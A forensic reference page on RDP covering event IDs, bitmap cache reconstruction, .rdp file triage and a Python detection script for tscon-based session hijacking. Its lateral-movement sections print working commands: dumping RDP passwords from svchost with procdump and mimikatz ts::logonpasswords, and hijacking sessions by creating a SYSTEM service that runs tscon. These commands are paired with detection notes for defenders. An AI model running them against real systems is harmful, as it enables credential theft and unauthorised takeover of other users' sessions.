# RDP

## Event Logs:

<figure><img src="https://3278866189-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu4e057u3LTRKJEHFetwE%2Fuploads%2FChbAcl5LRucDyKgIEXwi%2Fimage.png?alt=media&#x26;token=c516ec5a-4b42-42c7-8c21-dcfbfcdd5b95" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3278866189-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu4e057u3LTRKJEHFetwE%2Fuploads%2FzPi78k6Y9xiQBO4X8E2m%2Fimage.png?alt=media&#x26;token=3e605382-ff6a-4714-a51b-ef1a9cdb3e3f" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.13cubed.com/downloads/rdp_flowchart.pdf>" %}
13Cubed
{% endembed %}

{% embed url="<https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4624>" %}
4624 Logon Microsoft
{% endembed %}

{% embed url="<https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them>" %}
Logon Types and Mimikatz Impact
{% endembed %}

{% embed url="<http://woshub.com/rdp-connection-logs-forensics-windows/>" %}
RDP Log Hunting
{% endembed %}

### Disconnect/Reconnect: 4778/4779

<figure><img src="https://3278866189-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu4e057u3LTRKJEHFetwE%2Fuploads%2F55VBdl0RQ7yoVhGcE1i4%2Fimage.png?alt=media&#x26;token=dd02922e-76c9-4046-b96c-b17be294296a" alt=""><figcaption><p>4778 Reconnect to existing session</p></figcaption></figure>

<figure><img src="https://3278866189-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu4e057u3LTRKJEHFetwE%2Fuploads%2FiGXOoIpw0thXLwaOjKJi%2Fimage.png?alt=media&#x26;token=ca006443-1c9f-4fbf-8267-a51103f2b7c2" alt=""><figcaption><p>4779 Disconnects from session</p></figcaption></figure>

{% embed url="<https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4779>" %}

{% embed url="<https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4778>" %}

## Forensics:

### Source and Destination artifacts:

<figure><img src="https://3278866189-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu4e057u3LTRKJEHFetwE%2Fuploads%2F6Gr0zY5tkEKjGIR4Hn22%2Fimage.png?alt=media&#x26;token=df7cdea4-e430-406d-b053-aa08373db3c9" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3278866189-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu4e057u3LTRKJEHFetwE%2Fuploads%2FZRmXRrEQ2aQ7VkOC0pNA%2Fimage.png?alt=media&#x26;token=463e2328-823b-4909-b658-d2eac6130daf" alt=""><figcaption></figcaption></figure>

### Bitmap Cache

{% embed url="<https://www.allthingsdfir.com/do-you-even-bitmap-cache-bro/>" %}

{% embed url="<https://github.com/ANSSI-FR/bmc-tools>" %}

The bitmap cache stores static images from an RDP session on the client so that they can be referenced instead of retransmitted; its purpose is to optimize the RDP session.

We can leverage this artifact to reconstruct what the TA saw during the RDP session. It is useful for proving what a TA might have opened or which actions they performed.

File Location:

* `C:\Users\USERNAME\AppData\Local\Microsoft\Terminal Server Client\Cache\*`

Cache files are stored in .bin files.

<figure><img src="https://3278866189-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu4e057u3LTRKJEHFetwE%2Fuploads%2FCAhRoTyvqn4EUFxp2dhq%2Fimage.png?alt=media&#x26;token=0907d07d-39fc-47d9-b447-0e36ef763117" alt=""><figcaption></figcaption></figure>

Execute bmc-tools:

```shell
bmc-tools.py -s ./ -d ./output
```

The output images will be saved to the output folder.

<figure><img src="https://3278866189-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu4e057u3LTRKJEHFetwE%2Fuploads%2FiszTUNcBL1k9TkUz6n4Q%2Fimage.png?alt=media&#x26;token=7a95c0c3-35ea-4353-8786-cfaedb3d154c" alt=""><figcaption></figcaption></figure>

We can then stitch these image tiles together using RdpCacheStitcher.

{% embed url="<https://github.com/BSI-Bund/RdpCacheStitcher>" %}

Grab the compiled release version of the software and open the directory the image tiles are stored in. We can then stitch the tiles together to make a complete image.

<figure><img src="https://3278866189-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fu4e057u3LTRKJEHFetwE%2Fuploads%2FEiy39sYeafRqgyYA1Imh%2Fimage.png?alt=media&#x26;token=ffca8a7d-a741-4f65-8604-2276856edc2c" alt=""><figcaption></figcaption></figure>

### RDP Clipboard Forensics

{% embed url="<https://www.inversecos.com/2022/05/how-to-perform-clipboard-forensics.html>" %}

## RDP Lateral Movement

RDP credentials are stored in LSASS on the target computer. The plaintext passwords can be dumped from LSASS using mimikatz.

Introduced in Windows Server 2012 R2 and Windows 8.1, Restricted Admin mode provides additional security to remote logon scenarios. This mode of Remote Desktop causes the client application to perform a network logon challenge-response with the NT one-way function (NTOWF) or use a Kerberos service ticket when authenticating to the remote host. After the administrator is authenticated, the administrator does not have the respective account credentials in LSASS because they were not supplied to the remote host. Instead, the administrator has the computer account credentials for the session. Administrator credentials are not supplied to the remote host, so actions are performed as the computer account. Resources are also limited to the computer account, and the administrator cannot access resources with his own account.

{% embed url="<https://learn.microsoft.com/en-us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication>" %}

### <mark style="color:red;">Dump Passwords in Terminal Services:</mark>

1. Query the svchost process running Terminal Services.

```powershell
# service status and PID (use sc.exe: in Windows PowerShell, sc is an alias for Set-Content)
sc.exe queryex termservice

# process that has rdpcorets.dll loaded
tasklist /M:rdpcorets.dll

# listening sockets owned by TermService
netstat -nob | Select-String TermService -Context 1
```

2. Dump the process, or search its memory for the password string.

```powershell
# search the dump for a known password string (UTF-16LE); hard to find unless you already know it
strings -el svchost* | grep Password123 -C3

# dump the process with Task Manager or procdump (988 is the PID of the svchost found in step 1)
procdump64.exe -ma 988 -accepteula C:\Users\pentestlab

# mimikatz: extract RDP credentials from the Terminal Services process (run inside mimikatz)
privilege::debug
ts::logonpasswords
```

#### <mark style="color:blue;">Detection:</mark>

* Look for .dmp files on the host.

{% embed url="<https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/>" %}

### <mark style="color:red;">Dump saved credentials via DPAPI:</mark>

Credential Manager Location:

* C:\Users\username\AppData\Local\Microsoft\Credentials

{% embed url="<https://pentestlab.blog/tag/svchost/>" %}

{% embed url="<https://www.reddit.com/r/sysadmin/comments/r271kc/any_way_to_retrieve_password_from_rdp_file/>" %}

* Credentials are stored in Credential Manager, not in .rdp files.
* .rdp files reference Credential Manager for credentials.

#### <mark style="color:blue;">Detection:</mark>

*

### <mark style="color:red;">Tscon to hijack open RDP connections:</mark>

1. Requires SYSTEM privileges to accomplish.

```powershell
psexec -s \\localhost cmd
```

Another method is to create a service that will connect the selected session to ours.

2. List all sessions:

```powershell
C:\Windows\system32>query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 administrator                             1  Disc            1  3/12/2017 3:07 PM
>localadmin            rdp-tcp#55          2  Active          .  3/12/2017 3:10 PM

C:\Windows\system32>
```

3. Create a service which will hijack the user's session:

```powershell
C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
[SC] CreateService SUCCESS
```

4. Start the service:

```powershell
net start sesshijack
```

#### <mark style="color:blue;">Detection:</mark>

* Event IDs `4778` (reconnect) and `4779` (disconnect) can be used to figure out which desktop sessions got disconnected/reconnected.
* tscon.exe running as SYSTEM.
* tscon.exe executed as SYSTEM from a persistence method (scheduled task, service, WMI, etc.).
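The detection bullets above, worked as a hunt over exported Security events (an added example, not code from the original page): flag tscon.exe started as SYSTEM, walk its creator chain through 4688 records to see whether a service, task or WMI host launched it, and attach the 4778/4779 session events logged around the same time. Every event, PID and account below is a constructed sample shaped like Security-log fields, not real telemetry.

```python
"""Hunt for tscon-based RDP session hijacking in exported Security events.
Added example for the Detection bullets above, not code from the page; every
event below is a constructed sample shaped like Security-log fields.
"""

from datetime import datetime, timedelta

SYSTEM_SID = "S-1-5-18"                                          # Local System
SERVICE_HOSTS = {"services.exe", "svchost.exe", "wmiprvse.exe"}  # service / scheduled task / WMI hosts
WINDOW = timedelta(seconds=30)                                    # pair session events this close to tscon

EVENTS = [  # constructed: a service runs "cmd.exe /k tscon 1 /dest:rdp-tcp#55" as SYSTEM
    {"id": 4688, "time": "2017-03-12T15:12:00", "SubjectUserSid": SYSTEM_SID, "NewProcessId": "0x1a4",
     "NewProcessName": r"C:\Windows\System32\cmd.exe", "ProcessId": "0x2c8",
     "ParentProcessName": r"C:\Windows\System32\services.exe", "CommandLine": "cmd.exe /k tscon 1 /dest:rdp-tcp#55"},
    {"id": 4688, "time": "2017-03-12T15:12:01", "SubjectUserSid": SYSTEM_SID, "NewProcessId": "0x3e4",
     "NewProcessName": r"C:\Windows\System32\tscon.exe", "ProcessId": "0x1a4",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe", "CommandLine": "tscon 1 /dest:rdp-tcp#55"},
    {"id": 4779, "time": "2017-03-12T15:12:02", "SubjectUserName": "localadmin", "SessionName": "rdp-tcp#55"},
    {"id": 4778, "time": "2017-03-12T15:12:02", "SubjectUserName": "administrator", "SessionName": "rdp-tcp#55"},
    {"id": 4778, "time": "2017-03-12T16:00:00", "SubjectUserName": "localadmin", "SessionName": "rdp-tcp#56"},  # benign
]

_base = lambda p: p.rsplit("\\", 1)[-1].lower()  # file name from a full image path

def ancestry(events, ev):
    """Parent process names of ev, nearest first, following creator PIDs through earlier 4688 records."""
    by_pid = {e["NewProcessId"]: e for e in events if e["id"] == 4688}
    chain, cur = [], ev
    while cur is not None and len(chain) < 16:   # depth cap guards against PID-reuse loops
        chain.append(_base(cur["ParentProcessName"]))
        cur = by_pid.get(cur["ProcessId"])       # None once the creator has no 4688 record
    return chain

def find_tscon_hijacks(events):
    """One finding per tscon.exe launched as SYSTEM, with the session events logged within WINDOW."""
    when = lambda e: datetime.fromisoformat(e["time"])
    findings = []
    for ev in events:
        if ev["id"] != 4688 or _base(ev["NewProcessName"]) != "tscon.exe":
            continue
        if ev["SubjectUserSid"] != SYSTEM_SID:
            continue                              # a user reconnecting to their own session is expected use
        chain = ancestry(events, ev)
        related = [e for e in events if e["id"] in (4778, 4779) and abs(when(e) - when(ev)) <= WINDOW]
        findings.append({"time": ev["time"], "command": ev.get("CommandLine", ""), "ancestry": chain,
                         "via_service": bool(SERVICE_HOSTS & set(chain)),
                         "sessions": sorted((e["id"], e["SubjectUserName"], e["SessionName"]) for e in related)})
    return findings
```

On a real host the same logic applies to records pulled with Get-WinEvent or from a SIEM, provided 4688 auditing (with command line logging) is enabled.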

{% embed url="<https://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html>" %}

{% embed url="<https://ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement>" %}

### Rogue RDP:

{% embed url="<https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/>" %}

### RDP Files:

.rdp files are plaintext config files.

{% embed url="<https://www.reddit.com/r/sysadmin/comments/r271kc/any_way_to_retrieve_password_from_rdp_file/>" %}

* Credentials are stored in Credential Manager, not in .rdp files.
* .rdp files reference Credential Manager for credentials.

{% embed url="<https://superuser.com/questions/139665/how-to-save-rdp-credentials-into-a-file>" %}
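Because .rdp files are plaintext `key:type:value` lines, they are easy to triage when one arrives as an attachment (the Rogue RDP technique linked above). The parser below is an added example, not code from the page or from any of the linked projects; SAMPLE_RDP is a constructed file and its `password 51` hex is a placeholder, not a real DPAPI blob.

```python
"""Triage an .rdp file: parse its key:type:value lines and report the settings a
defender cares about when an .rdp attachment turns up. Added example, not code
from the page; SAMPLE_RDP is a constructed file, not a real capture.
"""

SAMPLE_RDP = """\
screen mode id:i:2
full address:s:203.0.113.10:3389
username:s:CORP\\someuser
password 51:b:01000000D08C9DDF0115D1118C7A00C04FC297EB
drivestoredirect:s:*
redirectclipboard:i:1
remoteapplicationmode:i:1
remoteapplicationprogram:s:||Explorer
prompt for credentials:i:0
"""  # constructed sample; the hex above is a placeholder, not a real DPAPI blob

def parse_rdp(text):
    """Return {key: value}; type s is a string, i an int, b a hex blob kept as text."""
    settings = {}
    for line in text.splitlines():
        parts = line.strip().split(":", 2)     # the value itself may contain ':' (host:port)
        if len(parts) != 3:
            continue                           # blank or malformed line
        key, typ, value = parts
        settings[key] = int(value) if typ == "i" else value
    return settings

def triage_rdp(text):
    """Return the parsed settings and a list of human-readable findings."""
    s, findings = parse_rdp(text), []
    if s.get("drivestoredirect"):              # '*' shares every local drive with the remote host
        findings.append(f"local drives redirected to the remote host: {s['drivestoredirect']}")
    if s.get("redirectclipboard") == 1:
        findings.append("clipboard redirection enabled")
    if s.get("remoteapplicationmode") == 1:    # session launches a RemoteApp instead of a desktop
        findings.append(f"RemoteApp mode, program: {s.get('remoteapplicationprogram', '')}")
    if "password 51" in s:                     # legacy saved-password field: DPAPI-protected, not plaintext
        findings.append("saved 'password 51' blob present (DPAPI-protected, not plaintext)")
    if s.get("prompt for credentials") == 0 and "username" in s:
        findings.append(f"connects as {s['username']} without prompting for credentials")
    return s, findings
```

Pair the `full address` value with your allow-list of known RDP hosts; a file that points outside it and also redirects drives is the combination worth escalating.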

## RDP Keyboard Layout:

{% embed url="<https://medium.com/@thedigitaldetective/remote-desktop-protocol-using-client-keyboard-input-in-attack-attribution-and-profiling-94a76f0f4ff4>" %}

## Anti-Forensics:

{% embed url="<https://medium.com/@bonguides25/delete-recent-rdp-history-entries-from-the-start-menu-and-taskbar-jumplist-cc72bd9396bc>" %}
